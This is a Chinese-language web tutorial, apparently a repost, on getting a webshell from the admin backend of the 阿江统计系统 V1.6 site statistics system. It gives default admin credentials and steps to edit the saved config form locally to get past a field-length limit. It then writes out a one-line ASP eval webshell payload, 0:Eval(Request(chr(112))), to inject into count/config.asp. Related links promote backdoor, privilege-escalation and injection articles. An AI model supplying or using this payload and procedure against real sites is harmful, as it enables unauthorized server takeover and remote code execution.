您现在的位置是:网站首页> 编程资料编程资料
阿江统计系统V1.6后台拿SHELL的方法_入侵防御_网络安全_
2023-05-24
323人已围观
简介 阿江统计系统V1.6后台拿SHELL的方法_入侵防御_网络安全_
无奈到了自己这里今天下午又碰到个一样的站 纠结···
不多说了 首先感谢小帆同学 猪猪同学对程序代码的分析·(我自己硬是整了半个小时没整出来利用方法·)
此后台默认的账号密码是 admin admin , ITlearner ITlearner
先进后台
来到修改配置界面 保存源文件到本地
本地打开源文件 找到原文章访问量 把maxlength="10 修改为 maxlength="100 下边是修改后的截图
然后在本地文件修改action地址 例如IE 中的提交地址是upload/2011/1/201101071923425208.jpg" width="581" onload="resizepic(this)" height="50" alt="" />
然后保存文件 用IE 打开 在网站访问量地址后写入 0:Eval(Request(chr(112)))
这个一句话的密码是P 点击修改 一句话就被插到了 count/config.asp 这个文件了 打开一句话客户端就可以连接了
只是个自己积累的小小的过程 对于网上关于阿江统计拿SHELL的方法我也测试了很多 但是没几个能成功的 所以专门写了这个文章出来 其实就是本地修改下字节 因为源程序中限制了写入的字节数 没有什么技术含量 不要骂我···
文章作者:冰鱼
相关内容
- 添加SHIFT后门又一法 学习如何查找后门_入侵防御_网络安全_
- SC.exe在渗透中的妙用_入侵防御_网络安全_
- webshell下执行CMD的小技巧分享_入侵防御_网络安全_
- webshell下提权两个小技巧分享_入侵防御_网络安全_
- ACCESS数据库后台sql语句执行导shell的方法_入侵防御_网络安全_
- 网站拿webshell一技巧_入侵防御_网络安全_
- serv_u提权记录: 530 Not logged in, home directory does not exist_入侵防御_网络安全_
- 手工注入拿到管理员密码登陆后台 图文_入侵防御_网络安全_
- 通过MySQL系统得到cmdshell的方法与防范_入侵防御_网络安全_
- 手动mysql 高级注入实例分析_入侵防御_网络安全_